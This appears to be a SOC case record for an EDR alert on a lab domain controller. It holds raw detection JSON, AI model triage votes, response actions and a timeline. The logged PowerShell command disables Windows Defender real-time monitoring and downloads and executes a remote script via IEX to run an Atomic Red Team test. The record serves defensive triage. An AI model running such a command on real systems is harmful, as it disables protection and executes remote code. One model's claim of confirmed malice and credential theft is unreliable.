high closed true positive

๐Ÿท๏ธ Analyst Verdict Classification

TP by analyst

🤖 AI Analysis

🔔 Detections (1)

00088-WIN-Set-MpPreference_Disabled high
Rule: service.WIN-Set-MpPreference_Disabled
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 88% · Verdict: true positive
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
249815040
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4575232, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 8460, 'THIS_ATOM': 'c896e11e93fdfcc580e177e469c2a841', 'THREADS': 3, 'TIMESTAMP': 1774364737221, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
8460
PROCESS_ID:
9156
THREADS:
30
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1 C:\Windows\TEMP\pld9B56.tmp.bat de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MITRE: T1562.001 T1059.001 T1039 T1105
Analyst Declaration:
📄 Raw Detection JSON
{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 249815040,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4575232,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8460,
        "THIS_ATOM": "c896e11e93fdfcc580e177e469c2a841",
        "THREADS": 3,
        "TIMESTAMP": 1774364737221,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8460,
      "PROCESS_ID": 9156,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
      "event_time": 1774364737793,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3799,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "c896e11e93fdfcc580e177e469c2a841",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "20e47fdec03e5cfc9f50dea369c2a844"
    }
  },
  "detect_id": "6888c1e1-7619-4ca8-9d92-542969c2a845",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364741593,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364737\u0026selected=20e47fdec03e5cfc9f50dea369c2a844",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
    "event_time": 1774364737793,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3799,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "c896e11e93fdfcc580e177e469c2a841",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "20e47fdec03e5cfc9f50dea369c2a844"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364741000
}
๐ŸŒ Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.883,
  "false_positive_reason": null,
  "investigation_questions": [
    "Who initiated the execution of the batch file in C:\\Windows\\TEMP?",
    "Is the hostname associated with a security researcher or a testing environment?",
    "Are there any network connections to GitHub or other external repositories following this event?"
  ],
  "ioc_analysis": "The primary IOC is the PowerShell command line which explicitly disables security controls and downloads scripts from a public GitHub repository (Red Canary ART). The process is running as NT AUTHORITY\\SYSTEM from a batch file in C:\\Windows\\TEMP, which is a common pattern for both automated testing and malicious lateral movement/execution.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1",
    "C:\\Windows\\TEMP\\pld9B56.tmp.bat",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1059.001",
    "T1039",
    "T1105"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Verify if an authorized security assessment or automated testing was scheduled for this host.",
    "Immediately re-enable Windows Defender Real-time Monitoring if the test was not authorized.",
    "Audit the host for any other unauthorized security testing tools or artifacts.",
    "Review the source of the batch file \u0027pld9B56.tmp.bat\u0027 in the TEMP directory."
  ],
  "risk_score": 92,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nThis detection identifies a PowerShell process executing a command to disable Windows Defender Real-time Monitoring (\u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027). The activity is part of an automated deployment and execution of the Atomic Red Team (ART) testing framework, specifically invoking test T1039 (Data from Network Shared Drive).\n\n**IOC Analysis:** The primary IOC is the PowerShell command line which explicitly disables security controls and downloads scripts from a public GitHub repository (Red Canary ART). The process is running as NT AUTHORITY\\SYSTEM from a batch file in C:\\Windows\\TEMP, which is a common pattern for both automated testing and malicious lateral movement/execution.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell scripts designed to disable Windows Defender real-time protection and deploy the Atomic Red Team (ART) framework. The command line explicitly contains IEX (Invoke-Expression) with a remote URL from GitHub, which is a classic indicator of malware delivery or credential theft.\n\n**IOC Analysis:** The process path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is legitimate, but the command line arguments are highly suspicious and malicious. The script disables real-time monitoring (Set-MpPreference), bypasses security protocols ([Net.ServicePointManager]), and executes remote code via IEX from a raw.githubusercontent.com URL. This matches known ART deployment patterns used by threat actors to establish persistence and evade detection.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection involves a PowerShell process running as SYSTEM with commands that disable Windows Defender real-time monitoring and install Atomic Red Team modules, indicating a potential attempt to bypass security and execute malicious scripts.\n\n**IOC Analysis:** The FILE_PATH is a legitimate PowerShell executable in C:\\Windows\\System32, which is a known-good location, and it is signed. However, the command line shows suspicious activities, including disabling security monitoring and downloading/installing tools from GitHub, which could be part of an attack. The hash is Microsoft-signed, but the behavior suggests malicious intent.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (critical, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}

โš™๏ธ Response Actions

| Action | Target | Status | Result |
|---|---|---|---|
| tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated |
| recommended | Manual analyst review required — AI models (majority) | executed | General Activity Sweep: 0 events found |
| recommended | Verify if an authorized security assessment or automated testing was scheduled for this host. | executed | General Activity Sweep: 0 events found |
| recommended | Immediately re-enable Windows Defender Real-time Monitoring if the test was not authorized. | executed | General Activity Sweep: 0 events found |
| recommended | Audit the host for any other unauthorized security testing tools or artifacts. | executed | General Activity Sweep: 0 events found |
| recommended | Review the source of the batch file 'pld9B56.tmp.bat' in the TEMP directory. | executed | File Activity Investigation: 0 events found |

๐Ÿ“ Add Note

💬 Notes (6)

🤖 FusionSOC AI 2026-03-24T17:07

📜 Timeline

2026-03-24T17:24:18
analyst
Status changed: investigating → closed
2026-03-24T17:23:59
analyst
Analyst classified as True Positive (TP)
2026-03-24T17:07:47
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T17:07:47
FusionSOC
Action recommended → executed: File Activity Investigation: 0 events found
2026-03-24T17:07:47
FusionSOC AI
Note by FusionSOC AI: ## 🔍 File Activity Investigation **Action:** Review the source of the batch file 'pld9B56.tmp.bat' in the TEMP directory...
2026-03-24T17:07:46
FusionSOC
Response action queued: recommended on Review the source of the batch file 'pld9B56.tmp.bat' in the TEMP directory.
2026-03-24T17:07:46
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T17:07:46
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T17:07:46
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Audit the host for any other unauthorized security testing tools or artifacts. *...
2026-03-24T17:07:45
FusionSOC
Response action queued: recommended on Audit the host for any other unauthorized security testing tools or artifacts.
2026-03-24T17:07:45
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T17:07:45
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T17:07:45
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Immediately re-enable Windows Defender Real-time Monitoring if the test was not ...
2026-03-24T17:07:45
FusionSOC
Response action queued: recommended on Immediately re-enable Windows Defender Real-time Monitoring if the test was not authorized.
2026-03-24T17:07:45
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T17:07:45
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T17:07:45
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Verify if an authorized security assessment or automated testing was scheduled f...
2026-03-24T17:07:45
FusionSOC
Response action queued: recommended on Verify if an authorized security assessment or automated testing was scheduled for this host.
2026-03-24T17:07:45
FusionSOC AI
Status changed: open → investigating
2026-03-24T17:07:45
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T17:07:45
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Manual analyst review required — AI models (majority) **Sensor:** `e4a1c62d-4d1f...
2026-03-24T17:07:44
FusionSOC
Response action queued: recommended on Manual analyst review required — AI models (majority)
2026-03-24T17:07:44
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T17:07:44
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T17:07:44
FusionSOC AI
Detection 6888c1e1-7619-4ca8-9d92-542969c2a845 triaged as true_positive (high severity, confidence: 88%)
2026-03-24T17:07:44
FusionSOC AI
Case created from detection: service.WIN-Set-MpPreference_Disabled